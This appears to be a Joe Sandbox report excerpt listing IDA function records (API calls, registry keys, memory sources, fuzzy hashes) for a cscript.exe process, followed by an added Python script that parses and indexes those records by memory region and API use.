                                                      • API ID: ActiveWindow
                                                      • String ID: WSH$WScript
                                                      • API String ID: 2558294473-1019903269
                                                      • Opcode ID: 608b9e08e6f1ecd77c943572b41aa99f63710a4069232a7af9637605d6dec08c
                                                      • Instruction ID: ce74c26ec84274810c5fd08cee7609f25d82ecde6f89fd4e8b933569908327ed
                                                      • Opcode Fuzzy Hash: 608b9e08e6f1ecd77c943572b41aa99f63710a4069232a7af9637605d6dec08c
                                                      • Instruction Fuzzy Hash: 8811D675700A258BC710DF28F844EAA3797AF95320B244159F915CB3E0DA35DC42CF96
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,0062C4E7,?,?,?), ref: 0062C598
                                                      • CoCreateInstance.OLE32(?,00000000,00000015,00623BD4,?,?,?,?,0062C4E7,?,?,?), ref: 0062C5DE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CreateFromInstanceProg
                                                      • String ID: WScript.CreateObject
                                                      • API String ID: 2151042543-1366894974
                                                      • Opcode ID: 10b58bbbd37bf8bf5800ab3a6aed37f90b768e9e902549fef6ad2d6be97787d4
                                                      • Instruction ID: 45d4f8c2ea4739fe7ea843786b981bce65b01eb50cc537d4abd7ca72f75620a4
                                                      • Opcode Fuzzy Hash: 10b58bbbd37bf8bf5800ab3a6aed37f90b768e9e902549fef6ad2d6be97787d4
                                                      • Instruction Fuzzy Hash: 0511E936E40A39BBDB121B80DC06F9D7A23EB05B61F124118FF007A291D7B19E50ABD9
                                                      APIs
                                                        • Part of subcall function 0063748C: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,?,00000000,0062F129,00000000,?,?,?,80000001,80000001,?,00632623), ref: 006374BE
                                                      • RegCloseKey.ADVAPI32(?,00000000,?,00020006,?,?,?,?,0062F129), ref: 00632666
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseCreate
                                                      • String ID: DisplayLogo$Timeout
                                                      • API String ID: 2932200918-1251482861
                                                      • Opcode ID: 1037f4a5ecf5a088285f7d91174251673b359add841219ad11da8dda1e3cca6e
                                                      • Instruction ID: 25704a081a534a67af7b59afe9b3ba2be5b95c9774564a379a0aadf24f61a571
                                                      • Opcode Fuzzy Hash: 1037f4a5ecf5a088285f7d91174251673b359add841219ad11da8dda1e3cca6e
                                                      • Instruction Fuzzy Hash: F9F0C8B1B042217BD72092548D67B9ABEDBDF81750F244065EA059B381D7B4ED01D7D1
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(?,ScriptEngine,00000000,00020019,?,00000000,?,?,00632A5F,?,006329F1,00000000), ref: 00632B18
                                                      • RegCloseKey.ADVAPI32(?,?,00632A5F,?,006329F1,00000000), ref: 00632B27
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseOpen
                                                      • String ID: ScriptEngine
                                                      • API String ID: 47109696-298518336
                                                      • Opcode ID: 1bd355f673ac8eb45d17d1e5bfd78c503eaf6e7274805dd283e7fc33ec9c21e6
                                                      • Instruction ID: 32960be44cb7b434b5bbc9d5c1903dd0b81ca9eadc75bc258f06e19a3d0ff162
                                                      • Opcode Fuzzy Hash: 1bd355f673ac8eb45d17d1e5bfd78c503eaf6e7274805dd283e7fc33ec9c21e6
                                                      • Instruction Fuzzy Hash: E3E08677E40335B7C73647849C16F9BB66EEB44B59F120111FD81FA280D665DE0055D0
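The function records above (an "APIs" list with `Name.MODULE(args), ref: addr` lines, a "Memory Dump Source" block naming the .sdmp region and snapshot file, and a "Similarity" block of IDs and fuzzy hashes) repeat for thousands of functions, so in practice they are read by script rather than by eye: which memory regions call which APIs, and which functions touch a given API or registry path. The parser below is an added example and is not Joe Sandbox code or part of this report; the record layout, the `$` separator inside the ID fields, the rule that a record ends at its "Instruction Fuzzy Hash" line, and the stripping of the page's "Download File" link residue are all assumptions inferred from the text on this page. The sample input is an excerpt of three records copied from this page with some hash lines dropped.

```python
"""Parse the per-function records the Joe Sandbox IDA plugin emits (the
'APIs' / 'Memory Dump Source' / 'Similarity' blocks listed above) and index
them by memory region and API use. Added example, not Joe Sandbox code; the
line layout and the '$'-separated ID fields are inferred from this page."""
import re
from collections import Counter

# Excerpt of three records from this page (constructed test input; some hash
# lines dropped, one 'Associated' line keeps the page's "Download File" residue).
SAMPLE = r"""
APIs
• GetFileSize.KERNEL32(0062B2EA,00000000,00000000,?,0062B55F,00000000,?,?,0062B2EA,?,?,?,?,00000000,00000000), ref: 0062B595
• CreateFileMappingA.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0062B5B6
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0062B55F,00000000,?,?,0062B2EA,?,?,?,?,00000000), ref: 0062B5D0
• GetLastError.KERNEL32(?,0062B55F,00000000,?,?,0062B2EA,?,?,?,?,00000000,00000000), ref: 0063142A
Memory Dump Source
• Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_620000_cscript.jbxd
Similarity
• API ID: File$CreateErrorLastMappingSizeView
• String ID:
• Opcode ID: 03cd76c34e6d516aa8a0db2b1c8d69c6bf91f67bbdf6b6d1acb5757940cd9ed2
• Instruction Fuzzy Hash: 5701F970240712AFE7301F755C09F6677DAEF00720F309529BA95EE2E0E770E4419B94
APIs
  • Part of subcall function 0063748C: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,?,00000000,0062F129,00000000,?,?,?,80000001,80000001,?,00632623), ref: 006374BE
• RegCloseKey.ADVAPI32(?,00000000,?,00020006,?,?,?,?,0062F129), ref: 00632666
Strings
Memory Dump Source
• Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
• Snapshot File: hcaresult_5_2_620000_cscript.jbxd
• API ID: CloseCreate
• String ID: DisplayLogo$Timeout
• Opcode ID: 1037f4a5ecf5a088285f7d91174251673b359add841219ad11da8dda1e3cca6e
• Instruction Fuzzy Hash: F9F0C8B1B042217BD72092548D67B9ABEDBDF81750F244065EA059B381D7B4ED01D7D1
APIs
• @_EH4_CallFilterFunc@8.LIBCMT ref: 04C1CFBD
Memory Dump Source
• Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
• Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
• Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
• API ID: CallFilterFunc@8
• String ID: @$@4Qw@4Qw
• Opcode ID: 989b96ccad6d8bf8810719ec3dafd93e9cc1306406cc331f13e7d471ceea1121
• Instruction Fuzzy Hash: 4941CE71A00254DFDB219FA9D840AAEBBF9FF45B08F00416EE906DB260E734F901DB64
"""

BULLET = "\u2022"
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function ADDR: ",
# and the LIBCMT variant with no argument list and no comma before "ref:".
API_RE = re.compile(r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?(?P<name>[^\s(]+)\.(?P<module>[A-Z0-9]+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^Source File:\s+(?P<file>\S+),\s+Offset:\s+(?P<offset>[0-9A-Fa-f]+),\s+based on PE:\s+(?P<pe>\w+)$")
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")  # "Snapshot File: x", "API ID: x", ...


def parse_records(text):
    """One dict per function; a record ends at its 'Instruction Fuzzy Hash' line."""
    records, cur = [], {"apis": [], "associated": [], "unparsed": []}
    for raw in text.splitlines():
        line = raw.strip().lstrip(BULLET).strip()
        if not line or line in HEADERS:
            continue
        if m := API_RE.match(line):
            cur["apis"].append({"name": m["name"], "module": m["module"], "args": m["args"],
                                "ref": int(m["ref"], 16), "subcall": m["caller"] is not None,
                                "caller": int(m["caller"], 16) if m["caller"] else None})
        elif m := SOURCE_RE.match(line):
            cur["source_file"], cur["offset"] = m["file"], int(m["offset"], 16)
        elif m := FIELD_RE.match(line):
            key, value = m["key"], m["value"].removesuffix("Download File")  # page link residue
            if key == "Associated":
                cur["associated"].append(value)
            else:
                cur[key.lower().replace(" ", "_")] = value
            if key == "Instruction Fuzzy Hash":  # last field the plugin prints per function
                records.append(cur)
                cur = {"apis": [], "associated": [], "unparsed": []}
        else:
            cur["unparsed"].append(line)
    if cur["apis"] or "snapshot_file" in cur:  # keep a truncated trailing record
        records.append(cur)
    return records


def split_ids(field):
    """'DisplayLogo$Timeout' -> ['DisplayLogo', 'Timeout'] ('$' separates entries)."""
    return [p for p in field.split("$") if p]


def index_by_region(records):
    """Snapshot file -> Counter of directly called API names, to compare what the
    original image region calls against a region that was written at run time."""
    idx = {}
    for rec in records:
        idx.setdefault(rec.get("snapshot_file", "?"), Counter()).update(
            a["name"] for a in rec["apis"] if not a["subcall"])
    return idx


def find_functions(records, wanted):
    """Records whose API list (direct or via subcall) intersects `wanted`."""
    hits = []
    for rec in records:
        if matched := {a["name"] for a in rec["apis"]} & set(wanted):
            hits.append({"snapshot_file": rec.get("snapshot_file"), "opcode_id": rec.get("opcode_id"),
                         "first_ref": min(a["ref"] for a in rec["apis"]), "matched": sorted(matched)})
    return hits
```

Feed `parse_records` the text of the whole function listing, then `index_by_region` shows per snapshot file (here the cscript.exe image at 00620000 versus the region at 04B60000) which APIs are called from where, and `find_functions` locates the functions that reach a given API such as `CreateFileMappingA` or `RegCreateKeyExW`, including through a recorded subcall. Records with lines the regexes do not recognise are kept with those lines in `unparsed` rather than dropped, so a layout change in the plugin output is visible instead of silently losing functions.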